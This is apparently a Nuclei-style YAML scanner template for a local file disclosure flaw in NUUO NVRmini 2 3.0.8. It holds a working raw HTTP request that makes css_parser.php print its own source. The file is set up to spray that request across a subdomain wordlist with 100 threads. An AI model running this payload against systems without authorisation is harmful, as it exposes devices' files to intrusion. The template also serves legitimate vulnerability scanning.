id: nuuo-file-inclusion.yaml
info:
  name: NUUO NVRmini 2 3.0.8 Local File Disclosure
  author: princechaddha
  severity: high
  reference: https://www.exploit-db.com/exploits/40211
  tags: nuuo,lfi

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /css_parser.php?css=css_parser.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
        Connection: close
        Accept: */*
        Accept-Language: en
        Accept-Encoding: gzip
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "$_GET['css']"
        part: body
      - type: word
        words:
          - "text/css"
        part: header
      - type: status
        status:
          - 200
